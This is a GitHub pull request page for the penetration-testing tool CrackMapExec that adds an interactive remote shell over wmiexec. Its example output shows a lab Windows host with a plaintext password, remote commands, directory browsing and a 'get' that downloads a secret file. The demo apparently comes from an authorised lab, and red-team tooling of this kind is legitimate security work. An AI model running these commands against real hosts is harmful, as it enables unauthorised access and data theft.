Skip to content
This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

adds interactive shell over wmiexec #422

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

adds interactive shell over wmiexec #422

wants to merge 2 commits into from

Conversation

awsmhacks
Copy link
Contributor

This PR adds the ability to start an 'interactive' shell on a target host using wmiexec only (for now).
get/put methods are available to the user to download/upload files while in interactive mode.

Example Usage, first showing command execution did not break :):

$ poetry run crackmapexec smb 192.168.0.103 -u eminem -p Admin\!23 -x 'dir c:\'
SMB         192.168.0.103   445    WIN7A            [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:WIN7A) (domain:swamp.local) (signing:False) (SMBv1:True)
SMB         192.168.0.103   445    WIN7A            [+] swamp.local\eminem:Admin!23 (Pwn3d!)
SMB         192.168.0.103   445    WIN7A            [+] Executed command
SMB         192.168.0.103   445    WIN7A            Volume in drive C has no label.
SMB         192.168.0.103   445    WIN7A            Volume Serial Number is 18F7-87FF
SMB         192.168.0.103   445    WIN7A
SMB         192.168.0.103   445    WIN7A            Directory of c:\
SMB         192.168.0.103   445    WIN7A
SMB         192.168.0.103   445    WIN7A            07/13/2009  08:20 PM    <DIR>          PerfLogs
SMB         192.168.0.103   445    WIN7A            11/15/2018  04:16 PM    <DIR>          Program Files
SMB         192.168.0.103   445    WIN7A            11/15/2018  04:12 PM    <DIR>          Program Files (x86)
SMB         192.168.0.103   445    WIN7A            10/08/2020  02:36 PM                11 secret.txt.txt
SMB         192.168.0.103   445    WIN7A            04/15/2020  05:57 PM    <DIR>          Users
SMB         192.168.0.103   445    WIN7A            05/01/2020  11:52 AM    <DIR>          Windows
SMB         192.168.0.103   445    WIN7A            10/08/2020  02:49 PM                 0 __output
SMB         192.168.0.103   445    WIN7A            2 File(s)             11 bytes
SMB         192.168.0.103   445    WIN7A            5 Dir(s)  15,534,632,960 bytes free









$ poetry run crackmapexec smb 192.168.0.103 -u eminem -p Admin\!23 -i
SMB         192.168.0.103   445    WIN7A            [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:WIN7A) (domain:swamp.local) (signing:False) (SMBv1:True)
SMB         192.168.0.103   445    WIN7A            [+] swamp.local\eminem:Admin!23 (Pwn3d!)
SMB         192.168.0.103   445    WIN7A            [*] Bout to get shellular
   .... I'm in
 Type help for extra shell commands
C:\>help

 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 put {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)
 get {file}                 - downloads pathname to the current local dir
 ! {cmd}                    - executes a local shell cmd

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 18F7-87FF

 Directory of C:\

07/13/2009  08:20 PM    <DIR>          PerfLogs
11/15/2018  04:16 PM    <DIR>          Program Files
11/15/2018  04:12 PM    <DIR>          Program Files (x86)
10/08/2020  02:36 PM                11 secret.txt
04/15/2020  05:57 PM    <DIR>          Users
05/01/2020  11:52 AM    <DIR>          Windows
10/08/2020  02:38 PM                 0 __output
               2 File(s)             11 bytes
               5 Dir(s)  15,534,637,056 bytes free

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 18F7-87FF

 Directory of C:\Users

04/15/2020  05:57 PM    <DIR>          .
04/15/2020  05:57 PM    <DIR>          ..
04/16/2020  10:05 AM    <DIR>          Administrator
12/23/2019  10:03 AM    <DIR>          agrande
02/11/2020  08:12 PM    <DIR>          arianna
12/23/2019  05:22 PM    <DIR>          drake
08/26/2020  01:44 PM    <DIR>          eminem
11/21/2010  12:16 AM    <DIR>          Public
               0 File(s)              0 bytes
               8 Dir(s)  15,535,734,784 bytes free

C:\Users>cd ..
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 18F7-87FF

 Directory of C:\

07/13/2009  08:20 PM    <DIR>          PerfLogs
11/15/2018  04:16 PM    <DIR>          Program Files
11/15/2018  04:12 PM    <DIR>          Program Files (x86)
10/08/2020  02:36 PM                11 secret.txt
04/15/2020  05:57 PM    <DIR>          Users
05/01/2020  11:52 AM    <DIR>          Windows
10/08/2020  02:38 PM                 0 __output
               2 File(s)             11 bytes
               5 Dir(s)  15,534,637,056 bytes free

C:\>get c:\secret.txt
C:\>exit

$ cat secret.txt
some secret
$

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
1 participant
@awsmhacks